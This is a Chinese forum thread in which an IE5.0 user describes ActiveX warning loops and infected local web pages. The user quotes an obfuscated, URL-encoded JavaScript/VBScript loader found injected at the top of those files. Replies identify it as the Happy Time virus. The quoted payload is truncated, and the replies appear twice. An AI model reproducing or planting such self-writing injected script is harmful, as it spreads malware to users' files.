近日,小弟用IE5.0打开某些网页时,会弹出一对话框:“该网页上ActiveX控件,可能不安全,建议不要打开”,还有“是”和“否”两个按钮,连续点击“否”不断谈出该对话框,在点击大概10几次后,会于C盘根目录生成一个名为“Readme.html”的文件。
用编辑软件打开这些有问题的网页,发现在网页代码的首部有如下代码:
<SCRIPT Language=JavaScript>
var jword = "%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0D%0Aif%20%28window.name%3D%3D%22trap%22%29%20window.moveTo%28-1000%2C-1000%29%3B%0D%0Afunction%20encrypt%28buffer%29%0D%0A%7B%0D%0A%20%20%20return%20escape%28buffer%29%3B%0D%0A%7D%0D%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A"
var nword = "%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0D%0A%27@%20thank%20you%21%20%20make%20use%20of%20other%20person%20to%20get%20rid%20of%(“此处略去若干行此类代码……”)"
nword = unescape(nword);
jword = unescape(jword);
document.write('<'+'SCRIPT Language=JavaScript>\n'+jword+'\n</'+'SCRIPT>');
document.write('<'+'SCRIPT Language=VBScript>\n'+nword+'\n</'+'SCRIPT>');
</SCRIPT>
这到底是怎么回事啊!我用金山毒霸II查毒没有什么发现,可是我的硬盘上原本好好的网页现都带上了以上这段代码。真是烦事人了,各位大侠请帮小弟一把,万分感谢!
7 个解决方案
#1
如果“原本好好的网页现都带上了以上这段代码”那就是中招了。前几天我刚中了happy time。
#2
你是打开什么网站出现这种情况的?
#3
haah
中朝了
中朝了
#4
呵呵 是一段加了密的 script
仔细看看
处了“=”等符号加密以外
其他的一些语句都能看出来
仔细看看
处了“=”等符号加密以外
其他的一些语句都能看出来
#5
普通的加密代码吗!
#6
是happytime病毒,我前几周就碰到了,用kv3000能杀除的。
#7
中招了
#1
如果“原本好好的网页现都带上了以上这段代码”那就是中招了。前几天我刚中了happy time。
#2
你是打开什么网站出现这种情况的?
#3
haah
中朝了
中朝了
#4
呵呵 是一段加了密的 script
仔细看看
处了“=”等符号加密以外
其他的一些语句都能看出来
仔细看看
处了“=”等符号加密以外
其他的一些语句都能看出来
#5
普通的加密代码吗!
#6
是happytime病毒,我前几周就碰到了,用kv3000能杀除的。
#7
中招了